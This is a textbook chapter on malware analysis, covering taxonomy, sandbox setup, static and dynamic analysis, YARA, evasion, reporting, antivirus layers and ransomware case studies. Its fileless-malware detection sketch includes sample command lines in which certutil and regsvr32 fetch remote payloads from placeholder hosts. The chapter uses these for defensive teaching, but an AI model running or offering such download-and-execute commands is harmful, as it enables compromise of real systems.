Chapter 15: Malware Analysis

“To defeat malware, you must first understand it.” (malware analysis doctrine)

Learning Objectives#

After completing this chapter, you will be able to:

Classify malware by type and describe the behavior and impact of each category.
Set up a safe, isolated analysis environment.
Perform static analysis to extract strings, imports, and metadata without executing a sample.
Perform basic dynamic analysis by observing system and network behavior during execution.
Identify common malware persistence mechanisms and their detection signatures.
Describe common evasion and anti-analysis techniques used by modern malware.
Produce a structured malware analysis report.
Explain how threat intelligence and YARA rules capture malware knowledge.

Key Terms#

Malware: malicious software designed to damage, disrupt, or gain unauthorized access.
Virus: malware that attaches to a legitimate file and spreads when that file is executed.
Worm: self-replicating malware that spreads across networks without user action.
Trojan: malware disguised as a legitimate program.
Ransomware: malware that encrypts victim files and demands payment for the key.
RAT: Remote Access Trojan; provides the attacker with remote control.
Rootkit: malware that hides its presence from the operating system and security tools.
Botnet: a network of compromised machines (bots) under central attacker control.
Dropper / Loader: malware that downloads or decrypts additional payloads.
Static analysis: analyzing a sample without executing it.
Dynamic analysis: executing a sample in a controlled environment and observing its behavior.
Sandbox: an isolated virtual environment for safe malware execution.
YARA: a pattern-matching language for malware identification.
IOC: Indicator of Compromise; artefact useful for detection or threat hunting.

15.1 Malware Taxonomy#

Viruses and Worms#

Viruses require a host file and spread when the infected file is executed. File infectors, macro viruses (embedded in Office documents), and boot-sector viruses are subcategories. Viruses were the dominant threat category before ubiquitous internet connectivity.

Worms are self-contained and propagate autonomously across networks by exploiting vulnerabilities or default credentials. The Morris Worm (1988) demonstrated catastrophic worm propagation on the early internet; WannaCry (2017) used the EternalBlue exploit (CVE-2017-0144) to spread across unpatched Windows networks worldwide, encrypting files as it went.

Trojans and RATs#

Trojans masquerade as legitimate software: a cracked game, a fake codec, a malicious email attachment. The user executes the Trojan voluntarily. A RAT (Remote Access Trojan) is a Trojan that establishes a persistent, attacker-controlled remote session, giving full control over the infected host: keylogging, screen capture, camera access, file management, and command execution.

Ransomware#

Ransomware encrypts victim files and demands a ransom for the decryption key. Modern ransomware campaigns combine encryption with exfiltration (double extortion) and sometimes threats of DDoS against the victim (triple extortion). The ransomware-as-a-service (RaaS) model allows operators to license the ransomware and infrastructure, taking a percentage of ransom payments, enabling technically unsophisticated actors to run sophisticated campaigns.

Ransomware Attack Chain#

Initial access via phishing, exploitation, or compromised credentials.
Privilege escalation to domain administrator.
Lateral movement to spread across the network.
Data exfiltration before encryption (double extortion).
Disable backups and shadow copies.
Deploy and execute ransomware payload.
Ransom note delivered.

Rootkits#

Rootkits operate at a high privilege level (kernel, hypervisor, firmware) and hide their presence by intercepting and modifying OS calls. A kernel rootkit that hooks the process-listing syscall can make itself invisible to ps, tasklist, and most security tools. Detection requires inspection from a known-good context: memory forensics run against a captured memory image on a clean analysis system, or a bootable forensic toolkit that bypasses the compromised OS.

Botnets and C2#

A botnet is a collection of compromised hosts (bots or zombies) under centralized attacker control. The bots communicate with a Command and Control (C2) server to receive instructions: send spam, participate in DDoS, mine cryptocurrency, or propagate ransomware. Modern C2 frameworks use HTTPS to blend with legitimate traffic, fast-flux DNS to rotate C2 IP addresses rapidly, and domain generation algorithms (DGA) to create thousands of possible C2 domains, making blocking impractical without threat intelligence.
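
One reason DGA traffic can stand out is that algorithmically generated labels tend to look more random than names chosen by people. The sketch below scores the left-most label of a domain by length and Shannon entropy. The thresholds and the sample domains are illustrative assumptions, not tuned detection parameters, and production DGA detection normally uses richer features.

```python
import math
from collections import Counter

def label_entropy(label: str) -> float:
    """Shannon entropy of a DNS label, in bits per character."""
    if not label:
        return 0.0
    counts = Counter(label)
    total = len(label)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())

def looks_generated(domain: str, min_len: int = 12, min_entropy: float = 3.5) -> bool:
    """Crude heuristic: a long, high-entropy first label. Thresholds are assumptions."""
    label = domain.lower().split(".")[0]
    return len(label) >= min_len and label_entropy(label) >= min_entropy

# Hypothetical DNS queries captured in the lab (not real indicators).
queries = ["update.example.com", "xkq7vz2m9tplw4bd.example.net", "mail.example.org"]
for q in queries:
    verdict = "DGA-like" if looks_generated(q) else "ordinary"
    print(f"{q:<32} {verdict}")
```

A heuristic like this only prioritizes domains for review; short or dictionary-based DGA output would slip past it, which is why the text stresses threat intelligence.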

15.2 Analysis Environment Setup#

Safe Lab Requirements#

Malware analysis requires a completely isolated environment where the sample cannot reach the internet, infect the analyst’s machine, or escape to the network. Requirements:

Network isolation: no connection to production networks; analysis network firewalled to a controlled fake internet or completely air-gapped.
Snapshot capability: take a clean snapshot before analysis; revert after each sample.
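Controlled internet simulation: INetSim and similar tools shipped with REMnux simulate DNS, HTTP, SMTP, and IRC so that malware behaves normally without reaching the real internet.
Host-only or internal networking: the analysis VM sits on a virtual network with no route to any physical network. A host-only adapter still lets the VM reach the analyst’s host, so firewall the host and disable shared folders and clipboard sharing, or use an internal-only network that connects the analysis VM to a separate services VM.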

REMnux and FlareVM#

REMnux (a Linux distribution) and FlareVM (officially FLARE-VM, a set of installation scripts that provisions a Windows VM) are curated toolkits for malware analysis. REMnux includes Wireshark, Volatility, Ghidra, YARA, INetSim, and hundreds of Python analysis libraries. FlareVM adds Windows-native tools: x64dbg, IDA Free, PEStudio, PEiD, and the Sysinternals Suite.

15.3 Static Analysis#

File Identification#

Before executing a sample, identify it from metadata alone:

Magic bytes: the first bytes of a file identify its format. PE files start with MZ (0x4D5A); ELF files with \x7fELF; ZIP/JAR/DOCX with PK. Malware often uses misleading extensions.
Hash lookup: compute the SHA-256 hash and query VirusTotal, MalwareBazaar, and Hybrid Analysis. A known hash gives immediate classification and prior analysis.
File size and entropy: high entropy (close to 8 bits/byte) indicates encryption or packing. Legitimate executables have lower entropy in their code section.
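
The three checks above can be sketched in a few lines of Python. This is a minimal illustration operating on bytes already read from a file; the MAGIC table holds only the signatures named in the text, and the function names (identify, entropy, triage) are hypothetical helpers rather than part of any tool.

```python
import hashlib
import math
from collections import Counter

# Signatures named in the text; a real tool would recognize many more formats.
MAGIC = {
    b"MZ": "PE (Windows executable)",
    b"\x7fELF": "ELF (Linux executable)",
    b"PK": "ZIP container (ZIP/JAR/DOCX)",
}

def identify(data: bytes) -> str:
    """Name the format from the leading magic bytes, ignoring any file extension."""
    for magic, name in MAGIC.items():
        if data.startswith(magic):
            return name
    return "unknown"

def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((c / total) * math.log2(c / total) for c in Counter(data).values())

def triage(data: bytes) -> dict:
    """Collect the metadata an analyst records before any execution."""
    return {
        "type": identify(data),
        "sha256": hashlib.sha256(data).hexdigest(),
        "size": len(data),
        "entropy": round(entropy(data), 2),
    }

# Hypothetical sample: an MZ header plus padding, standing in for open(path, "rb").read().
sample = b"MZ" + bytes(62)
print(triage(sample))
```

The SHA-256 value is what would be submitted to a hash-lookup service; the sketch deliberately makes no network request.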

PE Analysis#

PE (Portable Executable) is the Windows executable format. Key fields:

Imports (IAT): functions imported from DLLs. CreateRemoteThread + VirtualAllocEx + WriteProcessMemory suggests process injection. RegSetValueEx suggests persistence. CryptEncrypt + FindFirstFile suggests ransomware.
Sections: .text (code), .data (initialized data), .rsrc (resources). A PE with only one section, packer-specific section names (such as UPX0 and UPX1), or a section whose raw size on disk is far smaller than its virtual size in memory is likely packed.
Exports: functions the PE exports. Malware DLLs may export a minimal API for the loader.
Strings: extractable ASCII and Unicode strings often include URLs, registry keys, mutex names, error messages, and command-and-control infrastructure.
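
String extraction is simple enough to sketch directly. The function below is a rough Python analogue of the strings utility, assuming a minimum length of four characters and covering only printable ASCII and UTF-16LE (the usual "Unicode" encoding in Windows binaries). The blob and the domain in it are made up for illustration.

```python
import re
from typing import List

def extract_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Return printable ASCII strings, then UTF-16LE strings, of at least min_len characters."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    wide_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [m.group().decode("ascii") for m in ascii_re.finditer(data)]
    found += [m.group().decode("utf-16-le") for m in wide_re.finditer(data)]
    return found

# Hypothetical bytes standing in for a sample's contents.
blob = (
    b"\x00\x01http://c2.example.test/gate.php\x00\xff"
    + "Software\\Run".encode("utf-16-le")
    + b"\x00\x00ab\x00"
)
for s in extract_strings(blob):
    print(s)
```

Packed samples usually yield few meaningful strings, so a sparse result is itself a hint that unpacking is needed first.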

YARA Rules#

YARA matches patterns in files to classify malware families:

rule RansomwareCandidateStrings {
    strings:
        $enc1 = "Your files have been encrypted" nocase
        $enc2 = ".onion" nocase
        $crypt = { 43 72 79 70 74 41 63 71 75 69 72 65 43 6F 6E 74 65 78 74 }
    condition:
        2 of them
}

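YARA rules can match on text strings, hexadecimal byte patterns (optionally with wildcards), and regular expressions. The condition block combines matches with boolean logic; in the rule above, 2 of them fires when any two of the three strings are present.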
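
To make the rule above less opaque, the following sketch decodes its hex string and emulates its condition in plain Python. It is a stand-in for illustration only: it does not use the YARA engine, and two_of_them is a hypothetical helper name.

```python
# Hex string copied from the $crypt definition in the rule above.
crypt_hex = "43 72 79 70 74 41 63 71 75 69 72 65 43 6F 6E 74 65 78 74"
crypt = bytes.fromhex(crypt_hex)
print(crypt.decode("ascii"))  # prints CryptAcquireContext

def two_of_them(data: bytes) -> bool:
    """Pure-Python stand-in for the rule's `2 of them` condition."""
    lowered = data.lower()  # emulates the nocase modifier on the two text strings
    hits = [
        b"your files have been encrypted" in lowered,
        b".onion" in lowered,
        crypt in data,  # hex strings are matched byte for byte, so case matters
    ]
    return sum(hits) >= 2

print(two_of_them(b"YOUR FILES HAVE BEEN ENCRYPTED. Visit abc.ONION"))  # prints True
print(two_of_them(b"visit abc.onion"))                                  # prints False
```

Seeing that the hex bytes spell an API name explains why the rule pairs it with ransom-note text: either text string plus the crypto import is enough to flag a candidate.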

Reverse Engineering Malware with Ghidra#

When strings and signatures are not enough, an analyst disassembles and decompiles the sample to read its logic directly. Always do this on an isolated analysis VM with no production network access (Section 15.2). A practical workflow follows.

Triage first. Before opening a disassembler, record the file hash, run the file utility to identify the format, list imports and sections (PE or ELF headers), and extract strings. Imports such as CryptAcquireContext, WinHttpOpen, or CreateRemoteThread already hint at encryption, network, or process-injection behavior.
Import into Ghidra. Create a project, import the binary, and let auto-analysis run. Ghidra disassembles the code and lifts it into its P-Code intermediate representation, which powers a built-in decompiler that shows readable C-like pseudocode beside the assembly.
Find the interesting code. Start from what you already know: double-click a suspicious string or an imported API in the Symbol Tree or Imports view to jump to every place it is used. Following CryptAcquireContext or a ransom-note string usually lands you in the encryption routine.
Read and annotate. In the Decompiler window, rename functions and variables (for example FUN_00401abc becomes encrypt_files), add comments, and define data types as you understand them. Good naming turns machine code into a readable narrative and is the heart of reverse engineering.
Trace behavior. Follow calls to map the program: configuration parsing, persistence (registry keys, scheduled tasks), command-and-control URLs, and the cryptographic scheme. Ghidra’s cross-references (“References to”) show how functions connect.
Confirm dynamically. Static reading tells you what the code can do; confirm it by detonating the sample in the sandbox (Section 15.4) or stepping through a debugger, watching the API calls and network traffic you predicted statically.

Choosing a Reverse-Engineering Tool#

Ghidra is a comprehensive, free option, but other disassemblers and decompilers have distinct strengths:

Tool	Best for	Notes
Ghidra (NSA)	General cross-architecture analysis	Free and open source; P-Code IR; disassembler plus a native decompiler
IDA Pro (Hex-Rays)	Complex, commercial-grade analysis	Industry standard; polished pseudocode; Lumina function-metadata lookup; commercial
Binary Ninja	Scripting and workflow	Clean UI and a strong API; commercial, with a free cloud tier
JADX	Android applications	Lifts the Dalvik bytecode in APKs into readable Java source; open source
Cutter (rizin)	Lightweight free GUI	Open-source alternative; can use the Ghidra decompiler through a plugin

Match the tool to the target: a Windows PE or ARM firmware image suits Ghidra, IDA Pro, or Binary Ninja, while an Android APK is usually fastest to read in JADX. Reverse-engineer only samples you are authorized to analyze, and only inside an isolated lab.

15.4 Dynamic Analysis#

Behavioral Monitoring Tools#

During dynamic analysis, the analyst monitors:

Process activity: Process Monitor (ProcMon) logs file system, registry, and process/thread activity. New process spawning, registry Run key writes, and file creation in temp directories are suspicious.
Network activity: Wireshark captures all traffic; INetSim provides fake services for malware to interact with. DNS queries reveal C2 domains; HTTP requests reveal payloads.
API calls: API Monitor or a debugger can trace the Windows API calls the malware makes.

Common Malware Behaviors to Watch#

Behavior	What to observe	Significance
Persistence	Registry Run keys, Scheduled Tasks	Survival across reboots
Privilege escalation	UAC prompts, token impersonation	Gaining higher access
Process injection	CreateRemoteThread, WriteProcessMemory	Hiding in legitimate processes
C2 communication	Outbound HTTPS, DNS DGA queries	Command receipt, data exfiltration
Anti-VM check	CPUID, VMware registry keys, sleep	Evasion of sandbox analysis
Encryption	High CPU, file extensions changed	Ransomware payload execution
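
The table above can be turned into a small triage aid that labels observed events with the behavior they suggest. The sketch below assumes a simplified, hypothetical Event record (real ProcMon or API Monitor exports have many more fields), and the file extensions treated as ransomware markers are assumptions chosen for the example.

```python
from dataclasses import dataclass
from typing import Optional

@dataclass
class Event:
    kind: str    # "registry", "api", or "file" (simplified, hypothetical schema)
    detail: str  # registry key path, API name, or file path

def classify(event: Event) -> Optional[str]:
    """Map one observed event to a behavior from the table, or None if unremarkable."""
    d = event.detail.lower()
    if event.kind == "registry" and r"\currentversion\run" in d:
        return "Persistence"
    if event.kind == "registry" and "vmware" in d:
        return "Anti-VM check"
    if event.kind == "api" and d in {"createremotethread", "writeprocessmemory"}:
        return "Process injection"
    if event.kind == "file" and d.endswith((".locked", ".encrypted")):
        return "Encryption"
    return None

# Hypothetical events from one sandbox run.
observed = [
    Event("registry", r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater"),
    Event("api", "WriteProcessMemory"),
    Event("registry", r"HKLM\SOFTWARE\VMware, Inc.\VMware Tools"),
    Event("file", r"C:\Users\lab\Documents\report.docx.locked"),
    Event("file", r"C:\Windows\Temp\log.txt"),
]
for ev in observed:
    print(f"{classify(ev) or 'no flag':<18} {ev.detail}")
```

Rules this coarse produce false positives (legitimate installers also write Run keys), so the labels are prompts for the analyst rather than verdicts.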

15.5 Anti-Analysis and Evasion Techniques#

VM and Sandbox Detection#

Many malware samples check whether they are running in a virtual machine or automated sandbox and behave differently (or do nothing) if one is detected. Techniques include checking for VMware registry keys, querying CPUID for the hypervisor bit, counting running processes (sandboxes often have few), checking the disk size (sandboxes often have small disks), and sleeping for long periods to outlast automated analysis timeouts.

Packers and Obfuscators#

A packer compresses or encrypts the original payload (often both) and restores it at runtime, so static analysis sees only the unpacking stub, not the real payload. Unpacking may require running the sample until it unpacks itself and then dumping the restored PE from memory, using a known unpacker for common packers (for example, upx -d for UPX), or manual unpacking in a debugger.
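
The usual static hints of packing can be combined into a simple checklist. The sketch below works on a hypothetical Section record that an analyst would fill in from a PE parser; the 7.5 bits/byte entropy threshold mirrors the rule of thumb used in this chapter's simulation, and UPX0/UPX1 are UPX's default section names.

```python
from dataclasses import dataclass
from typing import List

@dataclass
class Section:
    name: str
    raw_size: int      # bytes stored on disk
    virtual_size: int  # bytes occupied in memory
    entropy: float     # bits per byte

KNOWN_PACKER_NAMES = {"UPX0", "UPX1"}

def packing_indicators(sections: List[Section]) -> List[str]:
    """List the reasons, if any, to suspect that a PE is packed."""
    reasons = []
    for s in sections:
        if s.name in KNOWN_PACKER_NAMES:
            reasons.append(f"{s.name}: packer section name")
        if s.raw_size == 0 and s.virtual_size > 0:
            reasons.append(f"{s.name}: empty on disk, filled at runtime")
        if s.entropy > 7.5:
            reasons.append(f"{s.name}: entropy {s.entropy:.2f} > 7.5")
    return reasons

# Hypothetical section table resembling a UPX-packed file.
packed = [
    Section("UPX0", 0, 0x8000, 0.0),
    Section("UPX1", 0x4000, 0x4000, 7.91),
    Section(".rsrc", 0x400, 0x400, 3.20),
]
for reason in packing_indicators(packed):
    print(reason)
```

An empty result does not prove a sample is unpacked; custom packers can keep ordinary section names and moderate entropy.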

Fileless Malware#

Fileless malware executes largely in memory by abusing legitimate system binaries (living-off-the-land binaries, or LOLBins) such as PowerShell, WMI, mshta, regsvr32, and certutil. Because little or no malicious executable is written to disk, file-based detection has nothing to scan. Detection requires memory forensics or behavioral monitoring of the LOLBin activity.
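
Behavioral monitoring of LOLBins often starts with process command lines. The sketch below flags a few widely documented abuse patterns using regular expressions. The rule names, the patterns, and the sample command lines are illustrative assumptions; a production rule set (for example, in Sigma) would be far broader and would handle obfuscation.

```python
import re
from typing import List

# Each rule: (description, pattern). Patterns are deliberately simple.
RULES = [
    ("PowerShell encoded command",
     re.compile(r"\bpowershell(?:\.exe)?\b.*\s-(?:e|ec|enc|encodedcommand)\s", re.I)),
    ("certutil used as a downloader",
     re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*https?://", re.I)),
    ("mshta loading remote content",
     re.compile(r"\bmshta(?:\.exe)?\b.*https?://", re.I)),
    ("regsvr32 fetching a remote scriptlet",
     re.compile(r"\bregsvr32(?:\.exe)?\b.*/i:https?://", re.I)),
]

def flag(cmdline: str) -> List[str]:
    """Return the descriptions of every rule that matches a process command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

# Hypothetical command lines from process-creation logs (addresses are documentation ranges).
logs = [
    "powershell.exe -NoProfile -WindowStyle Hidden -enc SQBFAFgA",
    "certutil -urlcache -split -f http://203.0.113.5/a.txt a.exe",
    "regsvr32 /s /n /u /i:http://example.test/file.sct scrobj.dll",
    "powershell.exe Get-ChildItem C:\\Users",
    "certutil -hashfile sample.bin SHA256",
]
for line in logs:
    print(flag(line) or ["no flag"], "<-", line)
```

The last two lines show why context matters: the same binaries run benign administrative commands all day, so detection keys on the arguments rather than the binary name.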

15.6 Malware Analysis Report Structure#

A structured analysis report includes:

Executive summary: one paragraph covering family, capabilities, and severity.
Sample metadata: file name, size, type, MD5/SHA-256, compile time.
Static analysis: imports, strings, sections, packer, YARA matches.
Dynamic analysis: persistence mechanisms, C2 communication, file activity.
IOCs: all extracted indicators (IPs, domains, hashes, file paths, registry keys).
MITRE ATT&CK mapping: technique IDs for each observed behavior.
Recommendations: detection rules (YARA, Sigma), remediation steps.
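
Keeping the report in a structured form makes it easy to share IOCs with other tools. The sketch below models the seven sections above as a Python dataclass and serializes it to JSON. The field names and every value in the example are hypothetical placeholders, not a standard schema.

```python
import json
from dataclasses import asdict, dataclass, field
from typing import Dict, List

@dataclass
class AnalysisReport:
    executive_summary: str
    sample: Dict[str, str]
    static_findings: List[str] = field(default_factory=list)
    dynamic_findings: List[str] = field(default_factory=list)
    iocs: Dict[str, List[str]] = field(default_factory=dict)
    attack_techniques: List[str] = field(default_factory=list)
    recommendations: List[str] = field(default_factory=list)

# Placeholder content for illustration only.
report = AnalysisReport(
    executive_summary="Hypothetical loader with process injection and Run-key persistence.",
    sample={"file_name": "sample_a.exe", "type": "PE32", "sha256": "<sha256 of the sample>"},
    static_findings=["Imports CreateRemoteThread, VirtualAllocEx, WriteProcessMemory"],
    dynamic_findings=["Writes a value under a registry Run key"],
    iocs={
        "domains": ["c2.example.test"],
        "registry_keys": [r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"],
    },
    attack_techniques=["T1055", "T1547"],
    recommendations=["Deploy the YARA rule to endpoints", "Block the listed domains"],
)
print(json.dumps(asdict(report), indent=2))
```

A fixed structure also makes omissions visible: an empty attack_techniques list is a reminder that the ATT&CK mapping has not been done yet.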

Related terms used in the rest of this chapter:

Worm / virus / Trojan: self-propagating, host-file-attached, and disguised malware, respectively.
Ransomware / RaaS / double extortion: file-encrypting extortion malware, sold as a service, that also leaks stolen data.
RAT / botnet / spyware / cryptominer / wiper / logic bomb: malware action categories.
Fileless malware: memory-resident malware abusing built-in tools to evade signatures.

15.7 Antivirus and Antimalware Defenses#

Having dissected how malware is built and analyzed, we turn to the defenses that try to stop it: the antivirus/antimalware layer. NIST’s Computer Security Resource Center defines malware as “a program that is inserted into a system, usually covertly, with the intent of compromising the confidentiality, integrity, or availability of the victim’s data, applications, or operating system, or otherwise annoying or disrupting the victim.” Malware is classified by how it propagates and what actions it performs, spanning attack kits, viruses, worms, and rootkits (the taxonomy of this chapter). Defenders face tens of thousands of new samples every day, which is why static signatures alone cannot keep up.

Antivirus technology has evolved through four generations: simple scanners that matched known signatures, heuristic engines that judged suspicious structure, activity/anomaly-based detection that watched behavior, and today’s next-generation (NextGen) AV that blends behavioral analytics and machine learning. Antimalware is best understood as the last line of defense: no single method is good enough by itself, NextGen capabilities are now necessary, and real-time scanning is essential rather than periodic sweeps.

Behaviorally, malware betrays itself through actions an antimalware engine can watch for: writing to restricted locations such as the registry or startup folders, modifying executables, opening/deleting/editing files in suspicious patterns, writing to the boot sector, and creating or injecting macros into documents. Two practical cautions close the topic: not all antivirus is created equal, so evaluate products before deploying, and while AV can be costly for an organization it remains a necessity, the final safety net beneath the firewalls, IDS/IPS, and detection methods of Chapters 11 and 12. The detection methods themselves (signature, heuristic, and anomaly/ML) are exactly those analyzed in Chapter 12, applied here at the endpoint.

Knowledge Check

According to NIST, what intent defines a program as malware?
List the four generations of antivirus technology in order.
Name three behaviors an antimalware engine watches for to identify malicious activity.

Answers: (1) Being inserted into a system, usually covertly, to compromise the confidentiality, integrity, or availability of the victim’s data, applications, or OS (or otherwise disrupt the victim). (2) Simple scanners, heuristics, activity/anomaly-based, and next-generation (NextGen) AV. (3) Any three of: writing to the registry or startup files, modifying executables, suspicious file open/delete/edit, writing to the boot sector, and creating/injecting document macros.

The Anti-* Family: Beyond Antivirus#

Antivirus is the best-known endpoint defense, but in practice it is one member of a family of complementary “anti-” controls, each tuned to a different threat, and a layered defense (defense-in-depth) runs several at once. Modern endpoint protection platforms (EPP) and endpoint detection and response (EDR) suites typically bundle most of them.

Antivirus / antimalware detect and remove malicious executables using the signature, heuristic, and anomaly methods of Chapter 12. The terms are now used almost interchangeably, “antimalware” simply emphasizing the broader modern scope (ransomware, trojans, worms, and more) beyond classic file viruses.
Anti-spyware targets software that covertly collects information, such as keyloggers, tracking cookies, infostealers, and stalkerware, watching for the telltale behaviors of data capture and exfiltration rather than destruction.
Anti-phishing defends the human attack vector of Chapter 4: email and web filters that score messages and links, block known malicious and look-alike (typosquatted) domains, warn on credential-harvesting pages, and enforce sender-authentication checks (SPF, DKIM, DMARC). Because most intrusions begin with phishing, this control is disproportionately valuable.
Rootkit detectors hunt the hardest class of malware, rootkits that subvert the operating system (or below it) to hide their own presence (Chapter analysis of stealth malware). Because a kernel-level rootkit can lie to any tool running on the same system, detectors use techniques a compromised OS cannot easily fake: cross-view analysis (comparing what the OS reports against a lower-level enumeration to spot hidden files, processes, or registry keys), integrity checking against known-good baselines (Tripwire/AIDE-style), behavior monitoring, and offline or boot-time scanning from trusted media. Tools such as GMER, chkrootkit, and rkhunter illustrate the approach.
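
Cross-view analysis reduces to a set difference between two enumerations of the same resource. The sketch below illustrates the idea with process IDs. Both lists are hypothetical; in practice one would come from a normal OS API and the other from a lower-level source such as a raw scan of kernel structures or a memory image.

```python
from typing import Set

def hidden_items(os_view: Set[int], low_level_view: Set[int]) -> Set[int]:
    """Items found by the low-level enumeration that the OS did not report."""
    return low_level_view - os_view

# Hypothetical PIDs: what the OS API listed vs. what a low-level scan found.
api_pids = {4, 612, 1044, 2280}
raw_scan_pids = {4, 612, 1044, 2280, 3916}

print(sorted(hidden_items(api_pids, raw_scan_pids)))  # prints [3916]
```

A non-empty difference is a lead, not proof: processes that start or exit between the two enumerations also appear, so tools typically repeat the comparison before raising an alert.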

The unifying lesson is the precision-versus-recall trade-off seen throughout the book: every one of these tools balances false positives against false negatives, none is sufficient alone, and the strongest posture layers them with the network controls of Chapters 11 and 12, the detection methods that power them, and user awareness, so that what one layer misses another can catch.

15.8 A Field Guide to Malware Types#

The taxonomy section above introduced classification by propagation and action; here we name the families an analyst meets, because identifying the type guides both analysis and response. The classic distinction is by how it spreads: a virus attaches to a host file and runs when that file is opened; a worm spreads by itself across a network with no user action (the property that makes worms so explosive); and a Trojan masquerades as benign software the user installs willingly. Layered on top is what it does:

Ransomware encrypts the victim’s files (or whole disks) and demands payment, now usually with double extortion (also stealing data and threatening to leak it) and sold as Ransomware-as-a-Service (RaaS).
Rootkits subvert the operating system (or below it) to hide, the stealth class the rootkit detectors of this chapter target.
Remote Access Trojans (RATs) give an attacker interactive control of a host.
Botnets enlist many compromised machines under a command-and-control (C2) server for DDoS, spam, or fraud (Chapters 3 and 11).
Spyware/infostealers and keyloggers covertly harvest data and credentials.
Cryptominers steal compute to mine cryptocurrency (“cryptojacking”).
Wipers destroy data outright (sometimes disguised as ransomware), and logic bombs trigger on a condition.
Fileless malware lives only in memory and abuses built-in tools (PowerShell, WMI), leaving little on disk and defeating signature scanners, which is why memory forensics (Chapter 13) and behavior-based detection (Chapter 12) matter.

Most real malware is blended, a phishing Trojan that drops a RAT that deploys ransomware, so these labels describe capabilities a single sample often combines.

15.9 The Malware Lifecycle and a Ransomware Deep Dive#

Malware rarely acts in one step; it follows a lifecycle that mirrors the kill chain of Chapter 12 and the post-exploitation of Chapter 9: delivery (phishing, drive-by, or exploiting a public service), execution and installation, persistence, command and control, privilege escalation and lateral movement, and finally actions on objectives (encrypt, exfiltrate, destroy). Ransomware is the most consequential modern example and repays a closer look. A typical intrusion gains initial access (often through phishing or an exposed service, Chapter 8), escalates and spreads over hours, exfiltrates data first (for double extortion), disables backups and security tools, and only then detonates encryption across the estate. The encryption itself uses sound cryptography against the victim: a fast symmetric cipher (AES) per file with the file keys wrapped under the attacker’s public key (Chapter 2), so victims cannot recover files without the attacker’s private key.

flowchart LR
    A[Phishing / exposed service] --> B[Execute + persist] --> C[Escalate + spread]
    C --> D[Exfiltrate data] --> E[Disable backups + tools] --> F[Encrypt everything] --> G[Ransom + leak threat]

The defenses follow directly from the lifecycle and from earlier chapters: phishing-resistant authentication and user training (Chapter 4), patching and least privilege to limit spread (Chapters 1 and 9), EDR/behavioral detection to catch the staging (Chapter 12), and, decisively, tested, offline/immutable backups so that encryption is a recoverable outage rather than a catastrophe (the durability and resiliency of Chapter 17). Paying ransoms is discouraged: it funds the ecosystem, may be legally restricted, and does not guarantee recovery.

Notable Ransomware Strains: LockBit 3.0 and Rorschach#

Two strains illustrate how modern ransomware industrializes the lifecycle above. LockBit 3.0 (also called LockBit Black), which appeared in 2022, was one of the most prolific ransomware-as-a-service (RaaS) operations of the early 2020s. It ran an affiliate program, used AES with elliptic-curve key wrapping, added cryptocurrency options such as Zcash, and even advertised a “bug bounty” inviting researchers to report flaws in its own code. Its builder leaked in September 2022, letting other criminals create custom variants. In February 2024 an international law-enforcement action named Operation Cronos, led by the UK National Crime Agency and the U.S. FBI with partners, seized LockBit’s infrastructure, servers, and accounts and disrupted the operation, later naming its lead operator.

Rorschach (also tracked as BabLock), reported by Check Point Research in 2023, shows how fast and stealthy encryption has become. At disclosure it was the fastest encryptor publicly measured, achieved through partial (intermittent) encryption of each file, efficient multithreading, and a hybrid scheme combining the curve25519 key exchange with the HC-128 stream cipher. It was delivered by DLL side-loading that abused a digitally signed component of a legitimate security product to load its malicious loader, used direct system calls to evade monitoring, and could self-propagate across a Windows domain, skipping machines configured with Commonwealth of Independent States (CIS) languages.

Free Recovery: The No More Ransom Project#

Before paying anyone, victims should check whether the files can be recovered for free. No More Ransom (https://www.nomoreransom.org), launched in 2016 by Europol’s European Cybercrime Centre, the Dutch National Police, and cybersecurity companies, is a global initiative that hosts hundreds of free decryption tools. Its Crypto Sheriff tool lets a victim upload the ransom note or a sample encrypted file to identify the exact strain and, if a decryptor exists, download it at no cost. The portal also links victims to report the attack to law enforcement in their region, which aids investigations and supports the incident-response and breach-notification duties of Chapter 14. Checking No More Ransom is a standard early step in ransomware response, alongside isolating affected systems and restoring from tested, offline backups, and it reinforces the chapter’s central point: paying is a last resort, not a recovery plan.

Chapter Summary#

This chapter is a practical guide to understanding malicious software. It set out a malware taxonomy and the safe analysis environment, then developed static and dynamic analysis and the anti-analysis and evasion techniques that malware uses to resist both. It described how to structure a malware analysis report, surveyed antivirus and antimalware defenses, and provided a field guide to malware types before a deep dive into the malware lifecycle and modern ransomware. The central message is that careful, isolated analysis turns an opaque sample into actionable indicators and that defenders must account for code that actively fights inspection.

Why This Matters#

Malware analysis transforms an unknown threat into a known one. Every IOC extracted, every behavior documented, and every YARA rule written benefits every organization using that intelligence. Analysis also drives detection engineering: a malware family’s unique import combinations, mutex names, or C2 patterns become Snort signatures, YARA rules, and SIEM correlation rules that detect the next infection before it spreads.

News in Focus: WannaCry and the Worm That Used a Leaked Exploit (2017)#

WannaCry, in May 2017, is the case that fused worm, ransomware, and a leaked nation-state exploit into a global incident. It spread automatically using EternalBlue, an exploit of a Server Message Block (SMBv1) vulnerability (CVE-2017-0144) that had been developed by a national intelligence agency and then leaked, and for which Microsoft had issued a patch (MS17-010) two months earlier. Unpatched Windows systems worldwide, including the UK’s National Health Service, were encrypted within hours; the spread was slowed when a researcher registered a “kill-switch” domain hard-coded in the malware. The episode distilled several of this book’s lessons at once: the danger of unpatched systems and legacy protocols, the dual-use and leakage risk of offensive tooling (Chapter 18), the destructive power of worm-like propagation, and the fact that the patch existed but had not been applied, exactly the patch-management gap the GreyNoise edge data in Chapter 8 quantified. (Figures and attributions are per public reporting on the incident.)

Knowledge Check

What property distinguishes a worm from a virus and a Trojan?
In a modern ransomware intrusion, why does the attacker exfiltrate data and disable backups before encrypting?
Why is fileless malware hard for traditional antivirus to catch, and which two techniques help?

